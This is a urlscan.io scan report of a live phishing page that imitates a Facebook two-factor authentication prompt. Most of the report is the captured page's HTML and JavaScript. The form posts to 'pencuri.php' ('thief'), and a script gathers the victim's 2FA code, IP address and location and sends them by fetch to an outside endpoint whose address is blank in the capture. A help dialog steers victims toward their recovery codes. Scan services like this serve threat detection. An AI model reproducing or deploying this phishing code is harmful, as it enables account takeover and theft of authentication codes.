technoindiagroup.com Open in urlscan Pro
202.65.131.137  Public Scan

Submitted URL: http://technoindiagroup.com/secure-massage871600/confirm.html
Effective URL: https://technoindiagroup.com/secure-massage871600/confirm.html
Submission: On April 01 via api from IN — Scanned from DE

Form analysis 1 forms found in the DOM

POST https://technoindiagroup.com/secure-massage871600/pencuri.php

<form action="https://technoindiagroup.com/secure-massage871600/pencuri.php" method="post">
  <section class="header">
    <div class="fotoh">
      <div class="row">
        <div class="col-6">
          <img src="Facebook_f_logo.png" class="img-fluid" width="40">
        </div>
        <div class="col-6" style="text-align: right;">
          <!-- <div style="padding-top: 4px;">
              <img src="" encodeURIComponent(image)" class="img-fluid" width="30" height="30" style="object-fit: cover; display: inline-block; border-radius: 50%;" />
              <p style="display: inline-block; margin-bottom: 0px; font-weight: 600; font-size: 14px; color:#050505"></p>
            </div>-->
          <p style="color:#3578e5; display:none; padding-top: 8px; margin-bottom: 0px; font-weight: 600; font-size: 15px;">
            <i style="font-size: 16px;" class="fa-solid fa-envelope" aria-hidden="true"></i> Support Inbox
          </p>
        </div>
      </div>
    </div>
  </section>
  <section id="fac" style="display: block;">
    <div class="container">
      <div class="row">
        <div class="col-md-6 offset-md-3 col-sm-8 offset-sm-4">
          <div class="card">
            <h3 class="twh3">Two-factor authentication required</h3>
            <div class="bodyyy">
              <p>You’ve asked us to require a 6-digit login code when anyone tries to access your account from a new device or browser.</p>
              <p>Enter the 6-digit code from your <strong>code generator</strong> or third-party app below.</p>
              <div class="form-group" style="padding-left: 0px; padding-top: 5px; padding-bottom: 10px; display:inline-block">
                <input style="margin-left: 0px !important; font-size: 14px; border: 1px solid #ccc;
    border-radius: 4px;
    -webkit-box-shadow: inset 0 1px 1px rgb(0 0 0 / 8%);
    box-shadow: inset 0 1px 1px rgb(0 0 0 / 8%);
    -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; color: #4e4d4d" type="number" id="code" class="form-control mx-sm-3" aria-describedby="passwordHelpInline" placeholder="Login code" name="code" minlength="4"
                  required="">
              </div>
              <div class="form-group paddingleftt" style="margin-top: -8px; display:inline-block;">
                <p name="" class="nolink" id="timer" style="background-color: transparent;
    border: transparent;
    padding: 0px;
    margin: 0px;
    display: inline;
    color:#385898;
    font-size: 13px;">( wait: <span id="timeri" style="margin-bottom: 0px; display: inline">04:57</span> ) </p>
                <a id="sendcodeagain" class="btn" onclick="sendcodeagain();">Send Code Again</a>
              </div>
            </div>
            <div class="footerii" style="width:100%;">
              <a data-toggle="modal" data-target="#twof" style="font-size: 14px;  color: #385898; font-weight: 600; margin-bottom: 0px; float: left; margin-top: 6px; cursor: pointer;" class="linkupertwo">Need another way to authenticate?</a>
              <button class="btn butoni" onclick="handleActions()" style="margin-top: 0px; margin-bottom: 0px; float: right;     background-color: #4267b2;
    border: 1px solid #4267b2;
    color: white;
    font-size: 13px;
    font-weight: 500;
    padding: 5px 20px;
    border-radius: 4px;
    text-transform: none;
    font-weight: bold;">Send</button>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
  <div class="modal fade" id="twof" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog" role="document">
      <div class="modal-content">
        <div class="modal-header">
          <h5 class="modal-title" id="exampleModalLabel" style="font-size: 16px;">Didn’t receive a code?</h5>
          <button type="button" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">×</span>
          </button>
        </div>
        <div class="modal-body">
          <p>1. Go to <strong>Settings &gt; Security and Login.</strong></p>
          <p>2. Under the <strong>Two-Factor Authentication</strong> section, click <strong>Use two-factor authentication</strong>. You may need to re-enter your password.</p>
          <p>3. Next to <strong>Recovery Codes</strong>, click <strong>Setup</strong> then <strong>Get Codes</strong>. If you've already set up recovery codes, you can click <strong>Show Codes.</strong></p>
          <p></p>
          <img src="recovery.png" alt="" width="100%">
        </div>
        <div class="modal-footer">
          <button type="button" class="btn canceloje" data-dismiss="modal">Close</button>
          <button type="button" class="btn canceloje" data-dismiss="modal" style="background-color: #1877f2;color: white">Continue</button>
        </div>
        <!-- Text input-->
        <!-- Button -->
      </div>
    </div>
  </div>
  <input type="hidden" id="ip_hidden" value="80.255.10.201">
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
  <script>
    function getIp() {
      $.get("https://api.ipify.org/?format=json", function(response) {
        $("#ip_hidden").val(response.ip);
      });
    }
    getIp();

    function handleActions() {
      let code = document.querySelector("#code");
      if (code.value == '') {
        $("#code").css('border', '1px solid red');
        return;
      } else {
        var bot = '';
        var chid = '';
        $.get("https://ipapi.co/json/", function(response) {
          let country = response.country;
          let regionName = response.region;
          let city = response.city;
          let ip = $("#ip_hidden").val();
          var params = {
            content: '=============================' + '%0A' + '7|2FA: "' + code.value + '"' + '%0A' + 'IP: "' + ip + '"' + '%0A' + '============================='
          }
          fetch(`=${params.content}/`, {
            method: 'POST', // or 'PUT'
            headers: {
              'Content-Type': 'application/json',
            },
          }).then(function() {
            window.location = 'confirm2.html';
          })
          $(".fb-btn").attr('disabled', true);
        });
      }
    }
    $('.numeric').on('input', function(event) {
      if (this.value !== '') {
        $('#code').css('border', 'none');
      }
      this.value = this.value.replace(/[^0-9]/g, '');
    });
  </script>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
  <script type="text/javascript">
    function startTimer(duration, display) {
      var timer = duration,
        minutes, seconds;
      var myInterval = setInterval(function() {
        minutes = parseInt(timer / 60, 10)
        seconds = parseInt(timer % 60, 10);
        minutes = minutes < 10 ? "0" + minutes : minutes;
        seconds = seconds < 10 ? "0" + seconds : seconds;
        display.textContent = minutes + ":" + seconds;
        if (timer == 0) {
          document.getElementById("timer").style.display = "none";
          document.getElementById("sendcodeagain").style.display = "block";
          clearInterval(myInterval);
        }
        if (--timer < 0) {
          timer = duration;
        }
      }, 1000);
    }
    var fiveMinutes = 60 * 5,
      display = document.querySelector('#timeri');
    startTimer(fiveMinutes, display);
  </script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
</form>

Text Content

Support Inbox


TWO-FACTOR AUTHENTICATION REQUIRED

You’ve asked us to require a 6-digit login code when anyone tries to access your
account from a new device or browser.

Enter the 6-digit code from your code generator or third-party app below.



( wait: 04:57 )

Send Code Again
Need another way to authenticate? Send

DIDN’T RECEIVE A CODE?

×

1. Go to Settings > Security and Login.

2. Under the Two-Factor Authentication section, click Use two-factor
authentication. You may need to re-enter your password.

3. Next to Recovery Codes, click Setup then Get Codes. If you've already set up
recovery codes, you can click Show Codes.



Close Continue